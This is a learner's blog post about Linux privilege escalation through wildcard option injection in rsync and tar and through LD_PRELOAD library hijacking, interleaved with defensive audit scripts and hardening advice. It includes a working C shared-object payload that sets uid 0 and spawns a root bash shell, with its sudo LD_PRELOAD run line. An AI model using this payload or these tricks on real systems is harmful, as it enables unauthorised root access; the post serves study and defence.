DEV Community

Devon Argent

Day 18: The Danger of Wildcards (*) & Library Injection 🕵️‍♂️

🛠️ The "Option Injection" Breakdown

1. When Filenames become Commands

When a script runs rsync -av * /backup/, the shell expands the * into a list of every file in the directory before rsync even starts. If an attacker can create a file named -e in that directory, it lands in rsync's argument list, and rsync interprets it as an option, not a file.

  • The Exploit: Using -e (rsync's remote-shell option) or --checkpoint-action (the equivalent trick against tar) to force the program to execute a malicious script as root.
  • The Fix: Never use naked wildcards in scripts that run as root. Always use absolute paths, or put the -- separator before the wildcard so the program treats everything after it as a filename rather than an option.
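The expansion described above, as an added example that is not part of the original post: a short POSIX shell script that audits a directory for option-like filenames before a backup job runs, and contrasts the naked-wildcard form with the -- form. It uses cat in place of rsync so the demonstration is harmless: a planted file named -n makes the naked form number its output lines, just as a planted -e would be parsed as an option by rsync. The sample directory, its filenames and the helper names are all constructed for the example.

```shell
#!/bin/sh
# Added example (not from the original post): shows that a shell wildcard hands a
# dash-prefixed filename to the command as an option, and that "--" stops it.
# "cat" stands in for rsync so the demo is harmless: a file named "-n" makes the
# naked form number its output lines, exactly as "-e" would become an rsync option.
export LC_ALL=C   # fixed collation so "-n" sorts before "data.txt" when * expands

# Audit check: does directory $1 contain any entry whose name starts with '-'?
# Returns 0 (true) if so. The wildcard here is anchored with a path, so entries
# come back as "$1/-n" and can never be mistaken for options.
dir_has_option_like_names() {
    for f in "$1"/*; do
        case "${f##*/}" in
            -*) return 0 ;;
        esac
    done
    return 1
}

# Vulnerable form: cd into the directory and pass a naked wildcard.
# The output of "cat *" is line-numbered because "-n" became an option.
naked_cat() { ( cd "$1" && cat * ); }

# Hardened form: "--" marks the end of options, so "-n" is opened as a file.
# Writing the wildcard as ./* achieves the same without relying on "--" support.
safe_cat() { ( cd "$1" && cat -- * ); }

# Constructed sample directory: one real file plus a planted "-n".
make_sample_dir() {
    d=$(mktemp -d) || exit 1
    printf 'alpha\n' > "$d/data.txt"
    : > "$d/-n"            # empty file whose name looks like an option
    printf '%s\n' "$d"
}

if [ "${1:-}" = "demo" ]; then
    d=$(make_sample_dir)
    dir_has_option_like_names "$d" && echo "warning: option-like filename in $d"
    echo "naked:"; naked_cat "$d"
    echo "safe:";  safe_cat "$d"
    rm -rf "$d"
fi
```

Run the script with the single argument demo to see both outputs side by side. For the backup job itself the same fix reads rsync -av -- * /backup/ or rsync -av ./* /backup/; the ./ prefix guarantees that no expanded argument can begin with a dash, and dir_has_option_like_names is the kind of pre-flight check a cron wrapper can run to alert on planted filenames.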

2. Hijacking the Dynamic Linker (LD_PRELOAD)

I practiced forcing a program to load a malicious .so (shared object) file before its legitimate libraries. By defining a void _init() function in C, I can execute code the moment the library is loaded.

```c
// root.c (the author's LD_PRELOAD demo, with the headers it needs added)
#include <stdlib.h>   // system()
#include <unistd.h>   // setuid()

// Runs when the shared object is loaded, before the target program's main()
void _init() {
    setuid(0);
    system("/bin/bash");
}
```

Execution: sudo LD_PRELOAD=/tmp/root.so

3. Library Search Order

Understanding how the loader finds libraries is key to Shared Library Hijacking. The typical order is:

  1. RPATH / RUNPATH
  2. LD_LIBRARY_PATH
  3. /etc/ld.so.cache
  4. /lib & /usr/lib
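Sections 2 and 3 describe the two preconditions a defender should look for: an environment that lets LD_PRELOAD or LD_LIBRARY_PATH reach a privileged process, and a directory early in the library search order that an unprivileged user can write to. The following POSIX shell script is an added example, not code from the original post; it audits both on constructed samples (a fake sudoers file, a fake /etc/ld.so.preload and a fake search path under a temporary directory) so it runs offline, and every file, directory and function name in it is an assumption of the example. The same functions work on real paths.

```shell
#!/bin/sh
# Added example (not from the original post): audits two preconditions that make
# LD_PRELOAD / search-path hijacking possible, without touching a real system:
#   1. a sudoers file that lets LD_PRELOAD or LD_LIBRARY_PATH survive sudo (env_keep),
#   2. a library search path containing a directory that "other" users can write to,
#      which would let an unprivileged user plant a same-named .so ahead of the real one.
# All inputs below are constructed samples; the audit functions also accept real paths.

# Return 0 if sudoers file $1 keeps a loader-controlling variable in the environment.
# Matches lines such as:   Defaults env_keep += "LD_PRELOAD"
sudoers_keeps_loader_vars() {
    grep -E '^[[:space:]]*Defaults.*env_keep.*(LD_PRELOAD|LD_LIBRARY_PATH)' "$1" >/dev/null
}

# Return 0 if the loader's global preload file $1 exists and names any library.
# (On a real host this is /etc/ld.so.preload; it should normally be absent or empty.)
preload_file_in_use() {
    [ -s "$1" ] && grep -v '^[[:space:]]*#' "$1" | grep -q .
}

# Print every directory in the colon-separated search path $1 that is writable by
# "other" (the 9th character of `ls -ld` output is 'w'). Order is preserved, so the
# first line printed is the earliest hijack point in the loader's search order.
world_writable_search_dirs() {
    echo "$1" | tr ':' '\n' | while IFS= read -r dir; do
        [ -d "$dir" ] || continue
        perm=$(ls -ld "$dir" | cut -c9)
        if [ "$perm" = "w" ]; then printf '%s\n' "$dir"; fi
    done
    return 0
}

# Constructed sudoers sample that preserves loader variables (the weak setting).
make_weak_sudoers() {
    f=$(mktemp) || exit 1
    cat > "$f" <<'EOF'
# constructed sample, not a real sudoers file
Defaults env_reset
Defaults env_keep += "LD_PRELOAD LD_LIBRARY_PATH"
alice ALL=(ALL) ALL
EOF
    printf '%s\n' "$f"
}

# Constructed sudoers sample with env_reset and only harmless variables kept.
make_hardened_sudoers() {
    f=$(mktemp) || exit 1
    cat > "$f" <<'EOF'
# constructed sample: env_reset with no loader variables kept
Defaults env_reset
Defaults env_keep += "LANG LC_ALL"
alice ALL=(ALL) ALL
EOF
    printf '%s\n' "$f"
}

# Constructed search path: a world-writable directory first (like a sloppy RPATH),
# then a root-style 755 directory. Prints the colon-separated path.
make_sample_search_path() {
    base=$(mktemp -d) || exit 1
    mkdir -m 1777 "$base/rpath_dir"    # writable by everyone: hijack point
    mkdir -m 755  "$base/usr_lib"      # typical /usr/lib permissions: safe
    printf '%s:%s\n' "$base/rpath_dir" "$base/usr_lib"
}

if [ "${1:-}" = "demo" ]; then
    s=$(make_weak_sudoers)
    sudoers_keeps_loader_vars "$s" && echo "finding: sudo preserves LD_PRELOAD/LD_LIBRARY_PATH in $s"
    p=$(make_sample_search_path)
    echo "world-writable search dirs:"; world_writable_search_dirs "$p"
    rm -f "$s"; rm -rf "$(dirname "${p%%:*}")"
fi
```

On a real host, run sudoers_keeps_loader_vars against /etc/sudoers (and the files in /etc/sudoers.d), preload_file_in_use against /etc/ld.so.preload, and world_writable_search_dirs against the RPATH/RUNPATH of setuid binaries and the value of LD_LIBRARY_PATH in privileged jobs; a hit on any of them means sudo or the loader will accept an attacker-chosen library before the legitimate one. One precision on the order listed above: glibc's ld.so consults DT_RPATH before LD_LIBRARY_PATH only when the binary has no DT_RUNPATH, consults DT_RUNPATH after LD_LIBRARY_PATH, and honours LD_PRELOAD entries before all of these.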

Follow my journey: #1HourADayJourney